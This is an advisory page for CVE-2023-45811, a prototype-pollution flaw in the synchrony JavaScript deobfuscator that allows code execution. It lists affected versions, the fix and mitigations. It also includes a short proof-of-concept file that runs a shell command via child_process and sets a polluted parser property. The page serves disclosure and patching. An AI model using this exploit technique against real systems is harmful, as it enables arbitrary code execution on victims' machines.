Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1qZzgyLXhoM3ctcmh4eM4AA2jA
Synchrony deobfuscator prototype pollution vulnerability leading to arbitrary code execution
Impact
A __proto__ pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation could lead to arbitrary code execution.
Summary
A __proto__ pollution vulnerability exists in the LiteralMap transformer allowing crafted input to modify properties in the Object prototype.
When executing in Node.js, due to use of the prettier module, defining a parser property on __proto__ with a path to a JS module on disk causes a require of the value which can lead to arbitrary code execution.
Patch
A fix has been released in [email protected].
Mitigation
- Upgrade synchrony to v2.4.4
- Launch node with the --disable-proto=delete or --disable-proto=throw flag
Proof of Concept
Craft a malicious input file named poc.js as follows:
// Malicious code to be run after this file is imported. Logs the result of shell command "dir" to the console.
console.log(require('child_process').execSync('dir').toString())
// Synchrony exploit PoC
{
var __proto__ = { parser: 'poc.js' }
}
Then, run synchrony poc.js from the same directory as the malicious file.
Credits
This vulnerability was found and disclosed by William Khem-Marquez.
Permalink: https://github.com/advisories/GHSA-jg82-xh3w-rhxxJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZzgyLXhoM3ctcmh4eM4AA2jA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 7.8
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.00043
EPSS Percentile: 0.10511
Identifiers: GHSA-jg82-xh3w-rhxx, CVE-2023-45811
References:
- https://github.com/relative/synchrony/security/advisories/GHSA-jg82-xh3w-rhxx
- https://nvd.nist.gov/vuln/detail/CVE-2023-45811
- https://github.com/relative/synchrony/commit/b583126be94c4db7c5a478f1c5204bfb4162cf40
- https://github.com/relative/synchrony/security/advisories/src/transformers/literalmap.ts
- https://github.com/advisories/GHSA-jg82-xh3w-rhxx
Blast Radius: 8.4
Affected Packages
npm:deobfuscator
Dependent packages: 3Dependent repositories: 12
Downloads: 163,326 last month
Affected Version Ranges: >= 2.0.1, < 2.4.4
Fixed in: 2.4.4
All affected versions: 2.0.1, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.2.0, 2.3.0, 2.4.0, 2.4.1, 2.4.2, 2.4.3
All unaffected versions: 1.0.0, 2.4.4, 2.4.5